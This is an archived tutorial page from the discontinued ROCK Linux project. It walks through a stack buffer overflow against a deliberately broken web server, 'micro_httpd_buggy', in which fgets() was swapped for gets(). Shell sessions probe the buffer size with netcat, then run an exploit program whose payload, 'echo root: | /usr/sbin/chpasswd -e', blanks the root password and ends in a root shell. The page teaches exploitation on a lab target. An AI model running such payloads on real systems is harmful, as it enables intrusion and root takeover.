WebHosting Paid by #1Payday.Loans


   The ROCK Linux project has been discontinued in 2010. Here are the old data for the historical record!

 

  A realistic example (micro_httpd_buggy)

Note on micro_httpd

The original micro_httpd is not exploitable this way. I've replaced the fgets() call used by micro_httpd with a gets() call.

Exploiting it

First let's see how big the input buffer in micro_httpd_buggy is:
duesentrieb:~$ printf '%-*s\n\n' 1000 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 10000 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 20000 'GET / HTTP/1.0' | ./netcat localhost 80
[ ... ]
duesentrieb:~$ printf '%-*s\n\n' 10116 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 10120 'GET / HTTP/1.0' | ./netcat localhost 80

Ok - so let's exploit it:

duesentrieb:~$ ./prog2b 5000 6000 5000 0xbffffabc 8000 \
               'echo root: | /usr/sbin/chpasswd -e' | \
               ./netcat localhost 80
duesentrieb:~$ su -
Password:
Hmm - that didn't work. Probably the 10120 bytes "buffer size" is not the size of the buffer, but the end of the stack instead. So it segfaults before beeing able to return from the function and execute our code. In that case the output would be generated before the function returns and that's why we even see something when we write over the end of our stack frame. That's bad, because now we don't know how big the buffer is. All we know that it is smaler than 1120 bytes. Let's try it with a value suitable for a 10000 bytes big buffer:
duesentrieb:~$ ./prog2b 5000 5000 5000 0xbffffabc 8000 \
               'echo root: | /usr/sbin/chpasswd -e' | \
               ./netcat localhost 80
duesentrieb:~$ su -
duesentrieb:~# 
Now we are root ...